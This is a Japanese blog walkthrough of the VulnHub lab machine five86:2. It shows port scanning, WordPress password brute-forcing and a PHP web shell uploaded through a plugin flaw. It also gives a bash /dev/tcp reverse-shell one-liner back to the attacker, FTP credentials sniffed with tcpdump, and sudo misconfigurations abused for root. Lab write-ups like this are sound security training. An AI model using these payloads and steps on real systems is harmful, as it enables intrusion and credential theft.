vulnhub five86:2のwalkthrough
はじめに
最近vulnhubを始めたので、write-upをメモとして残しておく 挑戦したのはこれ
www.vulnhub.com five86-1はやってないので、今度やる予定
vulnhubの調査に関しては以下を参考にした kakyouim.hatenablog.com
調査
まずは標的のIPアドレスを調査する
sudo netdiscover -r $ip
$ip部はその都度変更(例:192.168.100.0/24)
判明したので、/etc/hostsにfive86-2としておいた
次に、標的を調査する
$ nmap -p- -A -sV five86-2 Host is up (0.0017s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp ProFTPD 1.3.5e 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: WordPress 5.1.4 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Five86-2 – Just another WordPress site Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 112.19 seconds
ページにアクセスすると、wordpressで作られたページだった とりあえずwpscanを使って、ユーザ名を調査する
$ wpscan --url five86-2 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.8
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://five86-2/
[+] Started: Fri Feb 28 15:48:56 2020
Interesting Finding(s):
[+] http://five86-2/
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://five86-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://five86-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://five86-2/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://five86-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.4 identified (Latest, released on 2019-12-12).
| Found By: Rss Generator (Passive Detection)
| - http://five86-2/index.php/feed/, <generator>https://wordpress.org/?v=5.1.4</generator>
| - http://five86-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.4</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://five86-2/wp-content/themes/twentynineteen/
| Last Updated: 2020-02-25T00:00:00.000Z
| Readme: http://five86-2/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 1.4
| Style URL: http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3
| Style Name: Twenty Nineteen
| Style URI: https://github.com/WordPress/twentynineteen
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3, Match: 'Version: 1.3'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://five86-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] peter
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] barney
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] gillian
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] stephen
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Fri Feb 28 15:48:59 2020
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 13.343 KB
[+] Data Received: 549.372 KB
[+] Memory used: 126.762 MB
[+] Elapsed time: 00:00:02
ここからどうすればいいかわからなかったので、とりあえずパスワードをクラックできるか試してみた
適当にwordlistをダウンロードした。 user.txtは以下の通り
$ cat user.txt admin gillian peter barney stephen
$ wpscan --url five86-2 -P ./wordlist -U ./user.txt –threads 10 ~~~省略~~~ [SUCCESS] - barney / spooky1 [SUCCESS] - stephen / apollo1
これには結構時間がかかった
barneyとstephenのパスワードがわかったので、wpにログインする http://five86-2/wp-login.php
pluginsを見てみると一つだけactiveになっている
insert or embed articulate content into wordpress trial exploitでググると次のサイトが出てきた www.exploit-db.com
とりあえず以下を実行してZIPファイルを作成する
$ echo "<html>hello</html>" > index.html $ echo "<?php echo system($_GET['cmd']); ?>" > index.php $ zip poc.zip index.html index.php
Pagesからsample pageを編集する
編集画面からe-learningを選択する
設定はいじらずINSERTを押すと、以下のようになる
アクセスする
http://five86-2/wp-content/uploads/articulate_uploads/poc/index.html
リバースシェルを張る
$ ncat -lvp 1234
http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php?cmd=%2Fbin%2Fbash -c 'bash -i >%26 %2Fdev%2Ftcp%2F自IP%2F1234 0>%261' としてリバースシェルを張る(自IPを適宜変更)
ここからどうすればいいかよくわからなかったので、wordpressのアカウントでログインできるかやってみた
<-content/uploads/articulate_uploads/poc$ su stephen Password: apollo1 ls index.html index.php
stephenはいけたが、barneyは無理だった
ttyシェルに変更しておく
python3 -c 'import pty; pty.spawn("/bin/sh")'
手がかりがないか調べる
$ id uid=1002(stephen) gid=1002(stephen) groups=1002(stephen),1009(pcap)
$ find / -perm -u=s -type f 2>/dev/null /snap/core/8689/bin/mount /snap/core/8689/bin/ping /snap/core/8689/bin/ping6 /snap/core/8689/bin/su /snap/core/8689/bin/umount /snap/core/8689/usr/bin/chfn /snap/core/8689/usr/bin/chsh /snap/core/8689/usr/bin/gpasswd /snap/core/8689/usr/bin/newgrp /snap/core/8689/usr/bin/passwd /snap/core/8689/usr/bin/sudo /snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core/8689/usr/lib/openssh/ssh-keysign /snap/core/8689/usr/lib/snapd/snap-confine /snap/core/8689/usr/sbin/pppd /snap/core/8268/bin/mount /snap/core/8268/bin/ping /snap/core/8268/bin/ping6 /snap/core/8268/bin/su /snap/core/8268/bin/umount /snap/core/8268/usr/bin/chfn /snap/core/8268/usr/bin/chsh /snap/core/8268/usr/bin/gpasswd /snap/core/8268/usr/bin/newgrp /snap/core/8268/usr/bin/passwd /snap/core/8268/usr/bin/sudo /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core/8268/usr/lib/openssh/ssh-keysign /snap/core/8268/usr/lib/snapd/snap-confine /snap/core/8268/usr/sbin/pppd /usr/bin/gpasswd /usr/bin/pkexec /usr/bin/nc.traditional /usr/bin/at /usr/bin/mount /usr/bin/su /usr/bin/chfn /usr/bin/fusermount /usr/bin/chsh /usr/bin/passwd /usr/bin/umount /usr/bin/sudo /usr/bin/newgrp /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/snapd/snap-confine /usr/lib/eject/dmcrypt-get-device
$ cd /home $ ls -la total 40 drwxr-xr-x 10 root root 4096 Jan 9 04:49 . drwxr-xr-x 20 root root 4096 Jan 8 22:57 .. drwx------ 2 barney barney 4096 Jan 13 11:19 barney drwx------ 2 george george 4096 Jan 13 11:19 george drwx------ 2 gillian gillian 4096 Jan 13 11:19 gillian drwx------ 2 john john 4096 Jan 13 11:19 john drwx------ 3 paul paul 4096 Jan 13 11:19 paul drwx------ 4 peter peter 4096 Jan 13 11:19 peter drwx------ 2 richard richard 4096 Jan 13 11:19 richard drwx------ 3 stephen stephen 4096 Feb 28 05:27 stephen
わからない...
nmap結果を思い出す
$ nmap -p- -A -sV five86-2 Host is up (0.0017s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp ProFTPD 1.3.5e 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: WordPress 5.1.4 |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Five86-2 – Just another WordPress site Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 112.19 seconds
FTPが動いてる
$ ip address
~~~ 省略~~~
4: br-eca3858d86bf: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:e9:7c:0d:c8 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-eca3858d86bf
valid_lft forever preferred_lft forever
inet6 fe80::42:e9ff:fe7c:dc8/64 scope link
valid_lft forever preferred_lft forever
6: veth5661bf0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-eca3858d86bf state UP group default
link/ether ae:65:fb:03:f2:93 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::ac65:fbff:fe03:f293/64 scope link
valid_lft forever preferred_lft forever
tcpdumpしてみる。
$ timeout 100 tcpdump -w ftp.pcap -i veth5661bf0 tcpdump: listening on veth5661bf0, link-type EN10MB (Ethernet), capture size 262144 bytes 45 packets captured 45 packets received by filter 0 packets dropped by kernel
$ tcpdump -r ftp.pcap tcpdump -r ftp.pcap reading from file ftp.pcap, link-type EN10MB (Ethernet) 05:15:06.660136 IP 172.18.0.10.ftp-data > five86-2.35935: Flags [S], seq 3726234348, win 64240, options [mss 1460,sackOK,TS val 2061727388 ecr 0,nop,wscale 7], length 0 05:15:11.779988 ARP, Request who-has five86-2 tell 172.18.0.10, length 28 05:15:11.780055 ARP, Reply five86-2 is-at 02:42:e9:7c:0d:c8 (oui Unknown), length 28 05:16:01.411151 IP five86-2.43146 > 172.18.0.10.ftp: Flags [S], seq 1507466548, win 64240, options [mss 1460,sackOK,TS val 1051112056 ecr 0,nop,wscale 7], length 0 05:16:01.411199 IP 172.18.0.10.ftp > five86-2.43146: Flags [S.], seq 2912316704, ack 1507466549, win 65160, options [mss 1460,sackOK,TS val 2061782139 ecr 1051112056,nop,wscale 7], length 0 05:16:01.411242 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 1, win 502, options [nop,nop,TS val 1051112056 ecr 2061782139], length 0 05:16:01.413663 IP 172.18.0.10.32812 > _gateway.domain: 20351+ PTR? 1.0.18.172.in-addr.arpa. (41) 05:16:01.415003 IP _gateway.domain > 172.18.0.10.32812: 20351 NXDomain* 0/0/0 (41) 05:16:01.416604 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 1:58, ack 1, win 510, options [nop,nop,TS val 2061782145 ecr 1051112056], length 57: FTP: 220 ProFTPD 1.3.5e Server (Debian) [::ffff:172.18.0.10] 05:16:01.416649 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 58, win 502, options [nop,nop,TS val 1051112062 ecr 2061782145], length 0 05:16:01.417335 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 1:12, ack 58, win 502, options [nop,nop,TS val 1051112062 ecr 2061782145], length 11: FTP: USER paul 05:16:01.417347 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 12, win 510, options [nop,nop,TS val 2061782145 ecr 1051112062], length 0 05:16:01.417777 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 58:90, ack 12, win 510, options [nop,nop,TS val 2061782146 ecr 1051112062], length 32: FTP: 331 Password required for paul 05:16:01.417792 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 90, win 502, options [nop,nop,TS val 1051112063 ecr 2061782146], length 0 05:16:01.417864 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 12:33, ack 90, win 502, options [nop,nop,TS val 1051112063 ecr 2061782146], length 21: FTP: PASS esomepasswford 05:16:01.417871 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 33, win 510, options [nop,nop,TS val 2061782146 ecr 1051112063], length 0 05:16:01.429785 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 90:115, ack 33, win 510, options [nop,nop,TS val 2061782158 ecr 1051112063], length 25: FTP: 230 User paul logged in 05:16:01.429807 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 115, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 0 05:16:01.429844 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 33:41, ack 115, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 8: FTP: TYPE I 05:16:01.429856 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 41, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 0 05:16:01.429949 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 115:134, ack 41, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 19: FTP: 200 Type set to I 05:16:01.429955 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 134, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 0 05:16:01.430004 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 41:66, ack 134, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 25: FTP: PORT 172,18,0,1,184,215 05:16:01.430015 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 66, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 0 05:16:01.430123 IP 172.18.0.10.ftp > five86-2.43146: Flags [P.], seq 134:163, ack 66, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 29: FTP: 200 PORT command successful 05:16:01.430130 IP five86-2.43146 > 172.18.0.10.ftp: Flags [.], ack 163, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 0 05:16:01.430149 IP five86-2.43146 > 172.18.0.10.ftp: Flags [P.], seq 66:81, ack 163, win 502, options [nop,nop,TS val 1051112075 ecr 2061782158], length 15: FTP: STOR file.txt 05:16:01.430158 IP 172.18.0.10.ftp > five86-2.43146: Flags [.], ack 81, win 510, options [nop,nop,TS val 2061782158 ecr 1051112075], length 0 05:16:01.430364 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061782158 ecr 0,nop,wscale 7], length 0 05:16:02.436063 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061783164 ecr 0,nop,wscale 7], length 0 05:16:04.452086 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061785180 ecr 0,nop,wscale 7], length 0 05:16:06.564573 ARP, Request who-has 172.18.0.10 tell five86-2, length 28 05:16:06.564543 ARP, Request who-has five86-2 tell 172.18.0.10, length 28 05:16:06.565923 ARP, Reply five86-2 is-at 02:42:e9:7c:0d:c8 (oui Unknown), length 28 05:16:06.565945 ARP, Reply 172.18.0.10 is-at 02:42:ac:12:00:0a (oui Unknown), length 28 05:16:08.612344 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061789340 ecr 0,nop,wscale 7], length 0 05:16:12.196872 IP 172.18.0.10.ftp > five86-2.43144: Flags [P.], seq 3033351166:3033351225, ack 69910674, win 510, options [nop,nop,TS val 2061792925 ecr 1050992285], length 59: FTP: 425 Unable to build data connection: Connection timed out 05:16:12.196978 IP five86-2.43144 > 172.18.0.10.ftp: Flags [.], ack 59, win 502, options [nop,nop,TS val 1051122842 ecr 2061792925], length 0 05:16:12.198035 IP five86-2.43144 > 172.18.0.10.ftp: Flags [P.], seq 1:7, ack 59, win 502, options [nop,nop,TS val 1051122843 ecr 2061792925], length 6: FTP: QUIT 05:16:12.198077 IP 172.18.0.10.ftp > five86-2.43144: Flags [.], ack 7, win 510, options [nop,nop,TS val 2061792926 ecr 1051122843], length 0 05:16:12.198633 IP 172.18.0.10.ftp > five86-2.43144: Flags [P.], seq 59:73, ack 7, win 510, options [nop,nop,TS val 2061792927 ecr 1051122843], length 14: FTP: 221 Goodbye. 05:16:12.199019 IP 172.18.0.10.ftp > five86-2.43144: Flags [F.], seq 73, ack 7, win 510, options [nop,nop,TS val 2061792927 ecr 1051122843], length 0 05:16:12.202694 IP five86-2.43144 > 172.18.0.10.ftp: Flags [F.], seq 7, ack 74, win 502, options [nop,nop,TS val 1051122848 ecr 2061792927], length 0 05:16:12.202754 IP 172.18.0.10.ftp > five86-2.43144: Flags [.], ack 8, win 510, options [nop,nop,TS val 2061792931 ecr 1051122848], length 0 05:16:16.803932 IP 172.18.0.10.ftp-data > five86-2.47319: Flags [S], seq 3745878736, win 64240, options [mss 1460,sackOK,TS val 2061797532 ecr 0,nop,wscale 7], length 0
paul, esomepasswfordでログインしているようなので
$ su paul su paul Password: esomepasswford
writeupには書いてないけど、いつもやってた下のやつをやった
paul@five86-2:~$ sudo -l
Matching Defaults entries for paul on five86-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User paul may run the following commands on five86-2:
(peter) NOPASSWD: /usr/sbin/service
peterになれそう
paul@five86-2:/$ sudo -u peter /usr/sbin/service /bin/bash /bin/bash: unrecognized service
無理かも
paul@five86-2:~$ sudo -u peter /usr/sbin/service ../../bin/bash To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. peter@five86-2:/$
いけたけど、上がダメで下がいける理由はわからない。わかる人いたら教えてー
peter@five86-2:/home/peter$ sudo -l
Matching Defaults entries for peter on five86-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User peter may run the following commands on five86-2:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/passwd
rootになれそう
peter@five86-2:/home/peter$ sudo -u root /usr/bin/passwd root New password: root Retype new password: root passwd: password updated successfully
peter@five86-2:/home/peter$ su root Password: root root@five86-2:/home/peter#
rootになれたので、catして終わり
root@five86-2:/home/peter# cd /root cd /root root@five86-2:~# ls ls snap thisistheflag.txt root@five86-2:~# cat thisistheflag.txt
感想
むずかった。もっとごちゃごちゃしてたが、ある程度まとめるとこんな感じでした。数こなせばこのレベルだとスムーズにいけるかも
次はこれかも
